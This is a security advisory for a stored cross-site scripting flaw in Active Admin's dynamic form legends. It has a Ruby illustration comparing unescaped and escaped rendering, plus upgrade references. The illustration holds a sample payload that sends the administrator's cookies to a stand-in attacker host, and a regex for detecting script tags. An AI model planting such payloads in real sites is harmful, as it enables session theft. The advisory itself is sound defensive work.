CVE-2024-37031: activeadmin vulnerable to stored persistent cross-site scripting (XSS) in dynamic form legends
Users who set their Active Admin form legends dynamically may be vulnerable to stored XSS when the legend value can be supplied directly by a malicious user.
For example:
- A public web application allows users to create entities with arbitrary names.
- Active Admin is used to administrate these entities through a private backend.
- The form to edit these entities in the private backend has the following shape (note the dynamic name value, which depends on an attribute of the resource):
form do |f|
  # Dynamic legend: resource.name is chosen by a non-admin user and is rendered into the fieldset legend
  f.inputs name: resource.name do
    f.input :name
    f.input :description
  end
  f.actions
end
Then a malicious user could create an entity whose name carries a payload that gets executed in the Active Admin administrator's browser.
Both inputs blocks with an implicit or explicit name (i.e., both f.inputs resource.name and f.inputs name: resource.name suffer from the problem) are affected wherever the value of the name can be arbitrarily set by non-admin users.
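The following is an added example, not code from the advisory or from the Active Admin project. It models the sink the advisory describes with two stand-in legend renderers (one that interpolates the name raw, one that HTML-escapes it) so the effect of an attacker-chosen name can be observed offline; the sample entity name, the attacker.example host and the helper names are constructed for the illustration.

```ruby
require "erb"

# Constructed sample: an entity name a non-admin user submitted through the public
# application. The payload is a stand-in for what an attacker would store; it is
# not taken from the advisory.
MALICIOUS_NAME = %q{Widget<script>document.location='https://attacker.example/?c='+document.cookie</script>}

# Stand-in for the vulnerable behaviour the advisory describes: the legend text is
# emitted into the <legend> element unescaped, so markup in resource.name is live.
# This is a model of the code path, not Active Admin's own implementation.
def legend_vulnerable(name)
  "<fieldset class=\"inputs\"><legend><span>#{name}</span></legend></fieldset>"
end

# Hardened stand-in: the same legend with the untrusted value HTML-escaped
# (ERB::Util.html_escape encodes &, <, >, " and ').
def legend_escaped(name)
  safe = ERB::Util.html_escape(name)
  "<fieldset class=\"inputs\"><legend><span>#{safe}</span></legend></fieldset>"
end

# Cheap check a test suite can run over rendered admin pages: does a raw <script>
# tag or an inline event handler survive into the output?
def contains_active_markup?(html)
  !!(html =~ /<script\b|\son\w+\s*=/i)
end

# Simulates the edit form from the advisory, where the legend mirrors
# `f.inputs name: resource.name`. escape: false reproduces the vulnerable rendering.
def render_edit_form(resource_name, escape: true)
  legend = escape ? legend_escaped(resource_name) : legend_vulnerable(resource_name)
  "<form>#{legend}<input name=\"description\"></form>"
end

if __FILE__ == $0
  unsafe = render_edit_form(MALICIOUS_NAME, escape: false)
  safe   = render_edit_form(MALICIOUS_NAME)
  puts "vulnerable rendering carries active markup: #{contains_active_markup?(unsafe)}"
  puts "escaped rendering carries active markup:    #{contains_active_markup?(safe)}"
  puts safe
end
```

The references below point to activeadmin 3.2.2 (pull request 8349) as the release carrying the fix; the escaping in this example only demonstrates why the upgrade matters and is not a substitute for it. Applying an extra escape at the call site on an already-fixed version would double-encode the legend, so upgrade rather than patch around the library.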
References
- github.com/activeadmin/activeadmin
- github.com/activeadmin/activeadmin/pull/8349
- github.com/activeadmin/activeadmin/releases/tag/v3.2.2
- github.com/activeadmin/activeadmin/security/advisories/GHSA-9mg6-x45v-hcfm
- github.com/advisories/GHSA-9mg6-x45v-hcfm
- github.com/rubysec/ruby-advisory-db/blob/master/gems/activeadmin/CVE-2024-37031.yml
- nvd.nist.gov/vuln/detail/CVE-2024-37031
- rubygems.org/gems/activeadmin/versions/3.2.2